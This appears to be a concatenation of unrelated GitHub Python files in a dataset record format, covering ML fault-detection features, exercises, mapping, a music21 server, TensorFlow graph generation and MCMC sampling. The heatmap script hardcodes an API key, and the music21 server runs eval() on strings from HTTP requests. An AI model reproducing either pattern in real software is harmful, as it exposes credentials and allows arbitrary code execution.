layer!\")\n raise ValueError(\"Cannot find act in last layer! 
\")\n return False if cur_act in NEG_ACT else True\n\n\ndef output_dim_last_layer(model):\n return model.layers[int(rp.last_layer(model.layers))].output_shape[-1]\n\n# if __name__ == '__main__':\n# # print(sys.argv[0])\n# # print(os.path.dirname(sys.argv[0]))\n# parser = argparse.ArgumentParser(description=\"Feature extraction.\")\n# parser.add_argument('--dataset', '-ds', default='MNIST', help=\"Dataset name\")\n# parser.add_argument('--parent_path', '-pp', default=\"Programs\", help=\"Root path to the dataset\")\n# parser.add_argument('--result_dir', '-rs', default=\"result_dir\", help=\"Result directory\")\n# parser.add_argument('--feat_file_name', '-ffn', default=\"monitor_features.csv\", help=\"Name of Feature file\")\n# args = parser.parse_args()\n#\n# parent_path = args.parent_path\n# dataset = args.dataset\n# result_dir = args.result_dir\n# feat_file_name = args.feat_file_name\n#\n# timestamp = datetime.now().strftime(\"%y%m%d%H%M%S\")\n# output_path = os.path.join(parent_path, dataset, \"stat_{}.csv\".format(timestamp))\n#\n# agg = defaultdict(list)\n#\n# for index, program in enumerate(os.listdir(os.path.join(parent_path, dataset))):\n# print(\"\\n\", index, \"Processing dataset {} under {}\".format(dataset, parent_path))\n#\n# program_dir = os.path.join(os.path.join(parent_path, dataset, program))\n# if not os.path.isdir(program_dir):\n# continue\n#\n# for faulty_dir in os.listdir(program_dir):\n# print(\"Handling\", program_dir, faulty_dir)\n#\n# # if it is not a dir, continue\n# if not os.path.isdir(os.path.join(program_dir, faulty_dir)):\n# print(\"Skip. Not a dir.\")\n# continue\n#\n# # if monitor_features.csv does not exist, then skip\n# if not os.path.exists(os.path.join(program_dir, faulty_dir, \"result_dir\", \"monitor_features.csv\")):\n# print(\"Skip. 
result_dir or monitor_features.csv do not exist.\")\n#                 continue\n#\n#             label_dict = get_label_dict(faulty_dir)\n#\n#             cur_acc = 0.0\n#             # if best model under this setting is better than SAT_ACC, then reset its label\n#             if os.path.exists(os.path.join(program_dir, faulty_dir, \"result_dir\", \"checkpoint_model\")):\n#                 for file in os.listdir(os.path.join(program_dir, faulty_dir, \"result_dir\", \"checkpoint_model\")):\n#                     try:\n#                         cur_acc = max(float(file.replace(\".h5\", \"\").split(\"_\")[-1]), cur_acc)\n#                     except ValueError as e:\n#                         continue\n#\n#                 if cur_acc >= SAT_ACC[dataset]:\n#                     print(\"Reset Label to 'origin' because acc = {} >= {}\".format(cur_acc, SAT_ACC[dataset]))\n#                     label_dict = deepcopy(LABEL_DICT)\n#                     break\n#\n#             sev_val = _severity_val(SAT_ACC[dataset], cur_acc)\n#             sev_degree = _severity_degree(sev_val)\n#\n#             # concat path\n#             file_path = os.path.join(program_dir, faulty_dir, result_dir, feat_file_name)\n#\n#             # read csv, extract features\n#             df = read_csv(file_path)\n#             if has_enough_feature(df, min_feature=10) and has_enough_sample(df, min_sample=5):\n#                 # preprocess, convert bool dtype to int if necessary\n#                 df = convert_bool2int(df)\n#\n#                 # feature dimension is wrong\n#                 # if df.shape[1] != 22:\n#                 #     print(\"Incorrect feature dimension, should be 22, got\", df.shape[1])\n#                 #     continue\n#\n#                 # add program id, labels and label values\n#                 agg[\"program_id\"].append(program)\n#                 agg[\"Folder_id\"].append(faulty_dir)\n#                 agg = update_agg_by_dict(agg, label_dict)\n#\n#                 # agg[\"label\"].append(label)\n#                 # agg[\"severity_val\"].append(sev_val)\n#                 # agg[\"severity\"].append(sev_degree)\n#\n#                 agg = extract_feature(df, agg)\n#             print(\"Done\\n\")\n#\n#     # for debug only\n#     # for k, v in agg.items():\n#     #     print(k, len(v))\n#\n#     agg_df = pd.DataFrame.from_dict(agg)\n#     agg_df.to_csv(output_path)\n#     print(\"Export output to \", output_path)\n","repo_name":"ArabelaTso/DeepFD","sub_path":"CodeBook/Analyzer/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"39331531301","text":"# Olympiad prize winners\n# Based on the olympiad results, participants are awarded diplomas.\n# Participants with equal scores receive diplomas of the same degree.\n# A prize winner is a participant who received a diploma of III degree or better.\n# Given the olympiad results, determine the number of prize winners.\n# Input: a natural number of participants (N < 100), followed by N natural numbers – the participants' scores.\n# Output: a single number – the number of prize winners.\n# Example:\n# Input\n#\n# 10 1 3 4 3 5 6 7 7 6 1\n# Output\n# 5\n\n\ndef gen_list(size, at=-100, to=100):\n    import random\n    return [random.randint(at, to) for _ in range(size)]\n\n\ndef bubble_sort(nums, key=lambda x: x, reverse=False):\n    swapped = True\n    j = 0\n    while swapped:\n        swapped = False\n        for i in range(len(nums) - 1 - j):\n            if reverse:\n                expr = key(nums[i]) < key(nums[i + 1])\n            else:\n                expr = key(nums[i]) > key(nums[i + 1])\n            if expr:\n                nums[i], nums[i + 1] = nums[i + 1], nums[i]\n                swapped = True\n        j += 1\n    return nums\n\n\ndef rewarding(people: list):\n    people = bubble_sort(people, reverse=True)\n    prev = people[0]\n    prizes = 0\n    steps = 1\n    for human in people:\n        if steps <= 3:\n            prizes += 1\n        if prev != human:\n            steps += 1\n        prev = human\n    return prizes - 1\n\nif __name__ == '__main__':\n    olympigs = [10, 1, 3, 4, 3, 5, 6, 7, 7, 6, 1]\n    winners = rewarding(olympigs)\n    print(f'Total prize winners: 
{winners}')\n","repo_name":"xm4dn355x/specialist_python3_2nd_lvl","sub_path":"Module02/practice/06_task_sort.py","file_name":"06_task_sort.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37304522154","text":"class Solution:\n def sumEvenAfterQueries(self, nums: List[int], queries: List[List[int]]) -> List[int]:\n n = len(nums)\n evensum = 0\n for el in nums:\n if el % 2 == 0:\n evensum += el\n res = []\n for val, i in queries:\n if nums[i] % 2 == 0:\n evensum -= nums[i]\n nums[i] += val\n if nums[i] % 2 == 0:\n evensum += nums[i]\n res.append(evensum)\n return res","repo_name":"theabbie/leetcode","sub_path":"sum-of-even-numbers-after-queries.py","file_name":"sum-of-even-numbers-after-queries.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"5404850491","text":"import pandas as pd\r\nimport geopandas as gpd\r\nimport folium\r\nimport geocoder \r\nfrom folium.plugins import HeatMap\r\nfrom time import sleep\r\n\r\n# Load the Excel file with hotel data into a DataFrame\r\ndf = pd.read_excel(\"2017.xlsx\")\r\n\r\n\r\n# Assuming your Excel column with city names is named 'City' (change to the actual column name)\r\n# You may need to clean and preprocess the data to ensure the 'City' column is consistent and accurate.\r\ncity_counts = df['City'].value_counts()\r\nfor x in city_counts.keys():\r\n print(x,city_counts[x])\r\n\r\n\r\n\r\ng = geocoder.bing('Delhi', key='AsGXdjL7aL-H4vZdjl5m7BnlELyKTMi4_-CFrr7W4s4LQAkIWmkLZaO6cAD4iqAh')\r\nresults = g.json\r\nprint(results['lat'], results['lng'])\r\nlocations=[]\r\nfor x in city_counts.keys():\r\n g = geocoder.bing(x, key='AsGXdjL7aL-H4vZdjl5m7BnlELyKTMi4_-CFrr7W4s4LQAkIWmkLZaO6cAD4iqAh')\r\n results = g.json\r\n if(results==None):\r\n break\r\n # print(results['lat'], results['lng'])\r\n locations.append((x,results['lat'], results['lng']))\r\n \r\n\r\nprint(locations)\r\n\r\n# m=folium.Map([48,5],zoom_start=5)\r\n# HeatMap(locations )\r\n\r\n# # Download India's shapefile (for plotting boundaries)\r\n# india_map = gpd.read_file('indiashp')\r\n\r\n# # Merge hotel counts with India's shapefile based on city name\r\n# india_hotels = india_map.merge(city_counts, left_on='id', right_index=True,)\r\n\r\n# print(india_hotels)\r\n\r\n# india_hotels['geometry'] = india_hotels['geometry'].centroid\r\n# india_hotels['LAT'] = india_hotels['geometry'].y\r\n# india_hotels['LON'] = india_hotels['geometry'].x\r\n\r\n\r\n# print(\"\\n\\n\")\r\n# for _,y in india_hotels.iterrows():\r\n# print(y) \r\n# print(\"\\n\\n\")\r\n\r\n\r\n# Create a base map centered around India\r\nm = folium.Map(location=[20.5937, 78.9629], zoom_start=5)\r\n\r\n# Create a heatmap using the hotel counts\r\nheat_data = [(row[1], row[2], int(city_counts[row[0]])) for row in locations]\r\nprint(heat_data)\r\nHeatMap(heat_data, radius=15).add_to(m)\r\n\r\n# Save the map to an HTML file or display it\r\nm.save('heatmap.html')\r\n\r\n","repo_name":"PratikNimbalkar0404/Analysis-of-Hospitality-and-Tourism-Industry-of-India","sub_path":"GUI/mapcode.py","file_name":"mapcode.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73503634921","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nfrom music21 import chord\nimport 
os\nimport sys\nimport json\n\n# 対象のポート番号\nport: int = 8080\nif len(sys.argv) >= 1:\n try:\n port = int(sys.argv[1])\n except:\n pass\n\naddress = ('localhost', port)\nvartable = {}\ndo_exit = False\n_server = None\n\n\ndef callback(value) -> dict:\n \"\"\"\n 引数のオブジェクトからmusic21を実行して結果を辞書で返します\n \"\"\"\n global do_exit\n global vartable\n ret: dict = {}\n if 'command' not in value:\n return ret\n # コマンドごとに処理を分岐する\n command = value['command']\n if command == 'eval':\n expr = eval(value['source'])\n vartable[value['to']] = expr\n print(f'>> {expr}')\n ret = expr\n elif command == 'exit':\n do_exit = True\n else:\n raise f'unexpected command: {command}'\n return ret\n\n\nclass MyHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n global do_exit\n global _server\n parsed = urlparse(self.path)\n params = parse_qs(parsed.query)\n if 'json' not in params:\n self.send_response(400)\n return\n query = params['json']\n if len(query) == 0:\n self.send_response(400)\n return\n print(f'- {query}')\n self.send_response(200)\n self.send_header('Content-Type', 'text/plain; charset=utf-8')\n self.end_headers()\n try:\n obj = json.loads(query[0])\n self.wfile.write(json.dumps(\n {'status': 0, 'value': callback(obj)}).encode('utf-8'))\n except:\n print(f'!! {sys.exc_info()}')\n self.wfile.write(json.dumps(\n {'status': 1, 'value': {}}).encode('utf-8'))\n if do_exit:\n _server.server_close()\n\n def do_POST(self):\n self.send_response(400)\n\n\ndef main():\n global do_exit\n global _server\n with HTTPServer(address, MyHTTPRequestHandler) as server:\n _server = server\n while not do_exit:\n server.handle_request()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"desktopgame/music21server","sub_path":"src/m21server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3466495750","text":"import csv\n\ntry:\n from StringIO import StringIO # python 2\nexcept ImportError:\n from io import StringIO # python 3\n\n\nclass CSVRenderer(object):\n def __init__(self, info):\n pass\n\n def __call__(self, value, system):\n \"\"\" Returns a plain CSV-encoded string with content-type\n ``text/csv``. 
The content-type may be overridden by\n setting ``request.response.content_type``.\"\"\"\n\n request = system.get(\"request\")\n if request is not None:\n response = request.response\n ct = response.content_type\n if ct == response.default_content_type:\n response.content_type = \"text/csv; charset=utf-8\"\n\n fout = StringIO()\n writer = csv.writer(fout, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n writer.writerow(value.get(\"headers\", []))\n writer.writerows(value.get(\"rows\", []))\n\n return fout.getvalue()\n","repo_name":"GFDRR/thinkhazard","sub_path":"thinkhazard/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"18"} +{"seq_id":"69833448681","text":"from __future__ import print_function\nfrom annette.estimation import layers\nimport json\nimport numpy as np\nimport pandas as pd\nimport pickle as pkl\nimport logging\nfrom pathlib import Path\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport os\n\nfrom annette import get_database \nfrom annette.graph import AnnetteGraph\n\n#TODO renaming of tf_variables and move some things to the tf file\n\ndef generate_tf_model(graph):\n \"\"\"generates Tensorflow 2 graph out of ANNETTE graph description\n and stores to benchmark/graphs/tf2/ directory\n\n Args:\n graph :obj:`annette.graph.AnnetteGraph`: annette graph description to generate the tf2 graph from\n \"\"\"\n\n # generate tensorflow model and export to out_file\n\n # with __dict__ we can see the content of the class\n logging.debug(graph.__dict__)\n\n # model_spec contains some info about the model\n for key, value in graph.model_spec.items():\n logging.debug(key)\n logging.debug(value)\n\n network_name = graph.model_spec['name']\n\n filename = get_database( 'benchmark', 'graphs' ,'tf2', network_name+'.pb')\n logging.debug(\"Stored to: %s\" % filename)\n\n\nclass Graph_generator():\n \"\"\"Graph generator\"\"\"\n\n def __init__(self, network):\n #load graphstruct\n json_file = get_database('graphs','annette',network+'.json')\n self.graph = AnnetteGraph(network, json_file)\n print(self.graph)\n #load configfile\n \n def add_configfile(self, configfile):\n self.config = pd.read_csv(get_database('benchmarks','config', configfile))\n print(self.config)\n\n def generate_graph_from_config(self, num):\n # can be used as to generate input for generate_tf_model\n # execute the function under test\n\n def replace_key(value, config, num):\n if value in self.config.keys():\n logging.debug(\"%s detected\", value)\n return int(self.config.iloc[num][value])\n else:\n return value\n\n # model_spec contains some info about the model\n for key, value in self.graph.model_spec.items():\n logging.debug(key)\n logging.debug(value)\n\n tf.compat.v1.reset_default_graph()\n self.tf_graph = {}\n\n for layer_n, layer_attrs in self.graph.model_spec['layers'].items():\n logging.debug(\"layer name %s \" % layer_n)\n logging.debug(\"layer attrs %s \" % layer_attrs)\n for attr_n,attr_v in layer_attrs.items():\n logging.debug(\"attribute name %s\" % attr_n)\n logging.debug(\"attribute values %s\" % attr_v)\n\n if isinstance(attr_v, list):\n for n,attr_ele in enumerate(attr_v):\n #logging.debug(n)\n #logging.debug(attr_ele)\n self.graph.model_spec['layers'][layer_n][attr_n][n] = replace_key(attr_ele, self.config, num)\n else:\n self.graph.model_spec['layers'][layer_n][attr_n] = replace_key(attr_v, self.config, num)\n\n self.graph.compute_dims()\n\n 
logging.debug(\"Loop through layers\")\n\n for layer_n, layer_attrs in self.graph.model_spec['layers'].items():\n if layer_attrs['type'] == \"DataInput\":\n self.tf_graph[layer_n] = self.tf_gen_placeholder(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Conv\":\n self.tf_graph[layer_n] = self.tf_gen_conv(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Relu\":\n self.tf_graph[layer_n] = self.tf_gen_relu(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Add\":\n self.tf_graph[layer_n] = self.tf_gen_add(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"DepthwiseConv\":\n self.tf_graph[layer_n] = self.tf_gen_dwconv(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Pool\":\n self.tf_graph[layer_n] = self.tf_gen_pool(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Concat\":\n self.tf_graph[layer_n] = self.tf_gen_concat(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Flatten\":\n self.tf_graph[layer_n] = self.tf_gen_flatten(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"Softmax\":\n self.tf_graph[layer_n] = self.tf_gen_softmax(layer_attrs, layer_n)\n elif layer_attrs['type'] == \"MatMul\" or layer_attrs['type'] == \"FullyConnected\": # TODO check this! Maybe FullyConnected with bias\n self.tf_graph[layer_n] = self.tf_gen_matmul(layer_attrs, layer_n)\n else:\n print(\"no layer\")\n exit()\n\n logging.debug(\"Config %s\" % self.config.iloc[num])\n logging.debug(\"Current graph %s\" % self.tf_graph)\n\n # return annette graph\n out = self.graph.model_spec['output_layers']\n logging.debug(self.graph.model_spec)\n self.tf_export_to_pb(out)\n return out \n\n def tf_export_to_pb(self, output_node, save_path = None):\n # Collect default graph information\n g = tf.get_default_graph()\n\n with tf.Session() as sess:\n # Initialize the variables\n sess.run(tf.global_variables_initializer())\n g = g.as_graph_def(add_shapes = True)\n\n # Convert variables to constants until the \"fully_conn_1/Softmax\" node\n frozen_graph_def = tf.graph_util.convert_variables_to_constants(sess, g, output_node)\n\n print(\"load graph\")\n graph_nodes=[n for n in frozen_graph_def.node]\n names = []\n for t in graph_nodes:\n if not (\"Variable\" in t.name or \"BiasAdd\" in t.name):\n names.append(t.name.replace(\"/\",\"_\").replace(\"-\",\"_\"))\n print(names)\n\n # Write the intermediate representation of the graph to .pb file\n if save_path:\n net_file = save_path\n else:\n net_file = get_database('graphs','tf',self.graph.model_spec['name']+\".pb\")\n print(net_file)\n with open(os.path.join(net_file), 'wb') as f:\n graph_string = (frozen_graph_def.SerializeToString())\n f.write(graph_string)\n\n def tf_gen_pool(self, layer, name=None):\n logging.debug(\"Generating Relu with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n k_w = layer['kernel_shape'][1]\n k_h = layer['kernel_shape'][2]\n stride_w = layer['strides'][1]\n stride_h = layer['strides'][2]\n if layer['pooling_type'] == 'MAX':\n return maxpool(inp, (k_w, k_h),(stride_w, stride_h), name)\n elif layer['pooling_type'] == 'AVG' and layer['kernel_shape'][1] == -1:\n return globavgpool(inp, name)\n elif layer['pooling_type'] == 'AVG':\n return avgpool(inp, (k_w, k_h),(stride_w, stride_h), name)\n else:\n logging.error(\"only max pooling implemented currently\")\n exit()\n\n def tf_gen_concat(self, layer, name=None):\n logging.debug(\"Generating Concat with dict: %s\" % layer)\n inp_name0 = layer['parents'][0]\n inp_name1 = layer['parents'][1]\n inp = [self.tf_graph[x] for x in 
layer['parents']]\n return tf.concat(inp,axis=3,name=name)\n\n def tf_gen_add(self, layer, name=None):\n logging.debug(\"Generating Add with dict: %s\" % layer)\n if len(layer['parents']) == 2:\n inp_name0 = layer['parents'][0]\n inp_name1 = layer['parents'][1]\n inp0 = self.tf_graph[inp_name0]\n inp1 = self.tf_graph[inp_name1]\n return tf.add(inp0, inp1, name=name)\n else:\n raise NotImplementedError\n\n def tf_gen_flatten(self, layer, name=None):\n logging.debug(\"Generating Flatten with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n return flatten(inp, name)\n\n def tf_gen_relu(self, layer, name=None):\n logging.debug(\"Generating Relu with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n return relu(inp, name)\n\n def tf_gen_softmax(self, layer, name=None):\n logging.debug(\"Generating Softmax with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n return softmax(inp, name)\n\n def tf_gen_matmul(self, layer, name=None):\n logging.debug(\"Generating MatMul with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n filters = layer['output_shape'][1]\n return matmul(inp, filters, name)\n\n def tf_gen_conv(self, layer, name=None):\n logging.debug(\"Generating Conv with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n inp = self.tf_graph[inp_name]\n filters = layer['output_shape'][3]\n k_w = layer['kernel_shape'][0]\n k_h = layer['kernel_shape'][1]\n stride_w = layer['strides'][1]\n stride_h = layer['strides'][2]\n return conv2d(inp, filters, (k_w,k_h), (stride_w,stride_h), name)\n\n def tf_gen_dwconv(self, layer, name=None):\n logging.debug(\"Generating DWConv with dict: %s\" % layer)\n inp_name = layer['parents'][0]\n k_w = layer['kernel_shape'][0]\n k_h = layer['kernel_shape'][1]\n inp = self.tf_graph[inp_name]\n filters = layer['output_shape'][3]\n #return tf.layers.separable_conv2d(inp, filters, (k_w,k_h), padding='same')\n return dw_conv2d(inp, (k_w,k_h), (1, 1), name)\n\n def tf_gen_placeholder(self, layer, name=\"x\"):\n logging.debug(\"Generating Placeholder with dict: %s\" % layer)\n batch_size = layer['output_shape'][0]\n if batch_size == -1:\n batch_size = 1\n width = layer['output_shape'][1] \n height = layer['output_shape'][2]\n channels = layer['output_shape'][3]\n return tf.compat.v1.placeholder(tf.float32, [batch_size, width, height, channels], name=name)\n\ndef dw_conv2d(x_tensor, conv_ksize, stride, name):\n layer = slim.separable_convolution2d(x_tensor,\n num_outputs=None,\n stride=stride,\n depth_multiplier=1,\n kernel_size=conv_ksize,\n scope=name)\n return layer\n \n\ndef conv2d(x_tensor, filters, conv_ksize, stride, name):\n # Weights\n conv_strides = stride\n W_shape = list(conv_ksize) + [int(x_tensor.shape[3]), filters]\n W = tf.Variable(tf.truncated_normal(W_shape, stddev=.05))\n\n # Apply convolution\n x = tf.nn.conv2d(\n x_tensor, W,\n strides = [1] + list(conv_strides) + [1],\n padding = 'SAME',\n name = name\n )\n\n return x\n\ndef relu(x_tensor, name):\n # Nonlinear activation (ReLU)\n x = tf.nn.relu(x_tensor,name=name)\n return x\n\ndef softmax(x_tensor, name):\n # Nonlinear activation (ReLU)\n x = tf.nn.softmax(x_tensor,name=name)\n return x\n\ndef globavgpool(x_tensor, name='avg_pool'):\n x = tf.reduce_mean(x_tensor, axis=[1,2], name = name)\n return x\n\ndef maxpool(x_tensor, pool_ksize, pool_strides, name='max_pool'):\n # Max pooling\n x = tf.nn.max_pool(\n x_tensor,\n ksize = [1] + list(pool_ksize) + 
[1],\n strides = [1] + list(pool_strides) + [1],\n padding = 'SAME',\n name = name\n )\n return x\n\ndef avgpool(x_tensor, pool_ksize, pool_strides, name='avg_pool'):\n x = tf.nn.avg_pool(\n x_tensor,\n ksize = [1] + list(pool_ksize) + [1],\n strides = [1] + list(pool_strides) + [1],\n padding = 'SAME',\n name = name\n )\n\n return x\n\ndef flatten(x_tensor, name):\n x = tf.reshape(x_tensor, [1, np.prod(x_tensor.shape.as_list()[1:])], name = name)\n return x\n\ndef matmul(x_tensor, num_outputs, name):\n # Weights and bias\n s = [int(x_tensor.shape[1]), num_outputs]\n W = tf.Variable(tf.truncated_normal(s , stddev=.05))\n # The fully connected layer\n x = tf.matmul(x_tensor, W, name=name)\n return x\n\ndef output(x_tensor, num_outputs):\n with tf.name_scope('fully_conn'):\n # Weights and bias\n W = tf.Variable(tf.truncated_normal([int(x_tensor.shape[1]), num_outputs], stddev=.05))\n b = tf.Variable(tf.zeros([num_outputs]))\n\n # The output layer\n x = tf.add(tf.matmul(x_tensor, W), b)\n x = tf.nn.softmax(x)\n return x\n","repo_name":"embedded-machine-learning/annette","sub_path":"src/annette/benchmark/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":12593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"6217114897","text":"import json\nfrom copy import deepcopy\n\nfrom dataflow.batch.handlers.processing_batch_info import ProcessingBatchInfoHandler\nfrom dataflow.batch.handlers.processing_job_info import ProcessingJobInfoHandler\nfrom dataflow.shared.log import batch_logger\nfrom dataflow.shared.meta.processing.data_processing_helper import DataProcessingHelper\nfrom dataflow.shared.meta.result_table.result_table_helper import ResultTableHelper\nfrom dataflow.shared.storekit.storekit_helper import StorekitHelper\n\n\ndef parse_hdfs_params(rt_id):\n storage_response = ResultTableHelper.get_result_table_storage(rt_id, \"hdfs\")\n batch_logger.info(\"Try to get %s hdfs storages\" % rt_id)\n batch_logger.info(storage_response)\n return build_hdfs_params(rt_id, storage_response)\n\n\ndef build_hdfs_params(rt_id, meta_storage_response):\n storage_params = {}\n storage_connection_info = json.loads(meta_storage_response[\"hdfs\"][\"storage_cluster\"][\"connection_info\"])\n storage_params[\"physical_table_name\"] = meta_storage_response[\"hdfs\"][\"physical_table_name\"]\n storage_params[\"cluster_name\"] = meta_storage_response[\"hdfs\"][\"storage_cluster\"][\"cluster_name\"]\n storage_params[\"cluster_group\"] = meta_storage_response[\"hdfs\"][\"storage_cluster\"][\"cluster_group\"]\n storage_params[\"name_service\"] = storage_connection_info[\"hdfs_url\"]\n storage_params[\"data_type\"] = meta_storage_response[\"hdfs\"][\"data_type\"]\n if (\n meta_storage_response[\"hdfs\"][\"data_type\"] is not None\n and str(meta_storage_response[\"hdfs\"][\"data_type\"]).lower() == \"iceberg\"\n ):\n storage_params[\"storekit_hdfs_conf\"] = StorekitHelper.get_hdfs_conf(rt_id)\n return storage_params\n\n\ndef parse_ignite_params(rt_id):\n storage_response = ResultTableHelper.get_result_table_storage(rt_id, \"ignite\")\n batch_logger.info(\"Try to get %s ignite storages\" % rt_id)\n batch_logger.info(storage_response)\n storage_params = json.loads(storage_response[\"ignite\"][\"storage_cluster\"][\"connection_info\"])\n storage_params[\"physical_table_name\"] = storage_response[\"ignite\"][\"physical_table_name\"]\n return storage_params\n\n\ndef parse_source_fields(rt_id):\n fields_response = 
ResultTableHelper.get_result_table_fields(rt_id)\n batch_logger.info(\"Try to get %s fields\" % rt_id)\n batch_logger.info(fields_response)\n fields = []\n for field_response in fields_response:\n if field_response[\"field_name\"] != \"timestamp\" and field_response[\"field_name\"] != \"offset\":\n field = {\n \"field\": field_response[\"field_name\"],\n \"type\": field_response[\"field_type\"],\n \"origin\": rt_id,\n \"description\": field_response[\"field_name\"],\n }\n fields.append(field)\n return fields\n\n\ndef is_model_serve_mode_offline(processing_id):\n return DataProcessingHelper.is_model_serve_mode_offline(processing_id)\n\n\n# deprecated\ndef get_rt_job_submit_args_from_db(parent_rt_id):\n parent_job_info = ProcessingJobInfoHandler.get_proc_job_info(parent_rt_id)\n if parent_job_info.job_config is not None:\n job_config = json.loads(parent_job_info.job_config)\n if \"submit_args\" in job_config:\n parent_submit_args = json.loads(job_config[\"submit_args\"])\n if \"schedule_period\" in parent_submit_args:\n return parent_submit_args\n batch_info = ProcessingBatchInfoHandler.get_proc_batch_info_by_batch_id(parent_rt_id)\n return json.loads(batch_info.submit_args)\n\n\n# deprecated\ndef query_rt_period(parent_rt_id):\n job_info = ProcessingBatchInfoHandler.get_proc_batch_info_by_batch_id(parent_rt_id)\n return job_info.schedule_period\n\n\n# deprecated\ndef get_batch_min_window_size(submit_args, result_table_id):\n if submit_args[\"accumulate\"]:\n return 1, \"hour\"\n\n parent_windows = []\n unit = \"hour\"\n parent_result_tables = deepcopy(submit_args[\"result_tables\"])\n\n is_self_dependency = False\n if \"advanced\" in submit_args and \"self_dependency\" in submit_args[\"advanced\"]:\n is_self_dependency = submit_args[\"advanced\"][\"self_dependency\"]\n\n if is_self_dependency:\n parent_result_tables[result_table_id] = {}\n parent_result_tables[result_table_id][\"window_size\"] = submit_args[\"count_freq\"]\n parent_result_tables[result_table_id][\"window_delay\"] = submit_args[\"count_freq\"]\n parent_result_tables[result_table_id][\"window_size_period\"] = submit_args[\"schedule_period\"]\n\n for rt in parent_result_tables:\n window_size = int(parent_result_tables[rt][\"window_size\"])\n if parent_result_tables[rt][\"window_size_period\"] == \"day\":\n window_size = window_size * 24\n elif parent_result_tables[rt][\"window_size_period\"] == \"week\":\n window_size = window_size * 24 * 7\n elif parent_result_tables[rt][\"window_size_period\"] == \"month\":\n unit = \"month\"\n parent_windows.append(window_size)\n\n # 静态关联没有窗口,但是需要支持直连ignite,当直连ignite而没有其他hdfs表时,默认窗口为当前周期\n if len(parent_windows) == 0 and \"static_data\" in submit_args and len(submit_args[\"static_data\"]) > 0:\n window_size = int(submit_args[\"count_freq\"])\n if submit_args[\"schedule_period\"] == \"day\":\n window_size = window_size * 24\n elif submit_args[\"schedule_period\"] == \"week\":\n window_size = window_size * 24 * 7\n elif submit_args[\"schedule_period\"] == \"month\":\n unit = \"month\"\n parent_windows.append(window_size)\n return min(parent_windows), unit\n","repo_name":"Tencent/bk-base","sub_path":"src/api/dataflow/batch/utils/result_table_util.py","file_name":"result_table_util.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"3021289990","text":"import numpy as np\nfrom .samplers import Sampler\nfrom .._distributions import Distribution\nfrom .._distributions import Proposal\nfrom 
.._distributions import UniformStepProposal\n\n\n# Metropolis sampling\n#\n# Implements the Metropolis algorithm which forms a Markov Chain based on accepting ratios of probabiities\n#\n#\nclass MetropolisSampler(Sampler):\n def __init__(self, pdf: Distribution, proposal: Proposal):\n super().__init__(pdf)\n if proposal is None:\n self.proposal = UniformStepProposal(pdf.num_dimensions, pdf.support_limits)\n else:\n self.proposal = proposal\n self.ident = \"Metropolis Sampler\"\n\n def run(self, num_samples: int, params):\n initial: np.ndarray = np.asarray(params[0])\n self.last_run, self.acceptance = np.asarray(_metropolis_fast(self.distribution.probability,\n self.proposal.random_draw,\n self.distribution.num_dimensions,\n num_samples, initial))\n self.acceptance /= num_samples\n return self\n\n\ndef _metropolis_fast(pdf, proposal, ndims: int, nsamples: int, initial):\n chain = np.zeros((nsamples, ndims))\n chain_x = initial\n accept: int = 0\n # Reduce the number of calls to pdf by calculating now and only if we move (~ 20% speedup)\n old_p = pdf(chain_x) # speedup 2\n # Trade some memory for speed (~15/20%, possible proportional to acceptance ratio)\n rand_u = np.random.uniform(0.0, 1.0, nsamples) # speedup 1\n for i in range(nsamples):\n # Get new data\n new_x = proposal(chain_x)\n new_p = pdf(new_x)\n if new_p > 0.0:\n # Only progress the chain if the proposal is valid\n if old_p > 0.0:\n acceptance = new_p / old_p\n else:\n # if the old point was out of bounds, then accept new point\n acceptance = 1.0\n if rand_u[i] < acceptance:\n chain_x = new_x\n old_p = new_p # Only call if we move, speedup 3: assign instead (7%)\n accept += 1\n chain[i] = chain_x\n return chain, accept\n\n\n# Some pre-baked proposals for metropolis samplers (faster batching)\n#\n# Uniform random walking\n#\ndef _metropolis_uniform(pdf, step, ndims: int, nsamples: int, initial):\n chain = np.zeros((nsamples, ndims))\n chain_x = initial\n accept: int = 0\n walks = np.multiply(np.random.uniform(-1.0, 1.0, 